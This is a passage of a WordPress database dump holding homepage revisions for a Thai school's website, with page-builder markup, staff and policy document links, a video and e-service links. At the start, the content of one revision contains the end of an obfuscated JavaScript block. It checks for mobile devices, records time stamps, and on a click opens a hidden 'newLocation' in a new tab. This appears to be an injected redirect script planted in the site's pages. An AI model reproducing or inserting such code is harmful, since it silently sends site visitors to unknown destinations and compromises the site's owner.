_0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 08:51:45','2024-08-30 01:51:45','',19,'http://watprato.ssk.in.th/?p=276',0,'revision','',0),
(277,2,'2024-08-30 08:52:50','2024-08-30 01:52:50','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 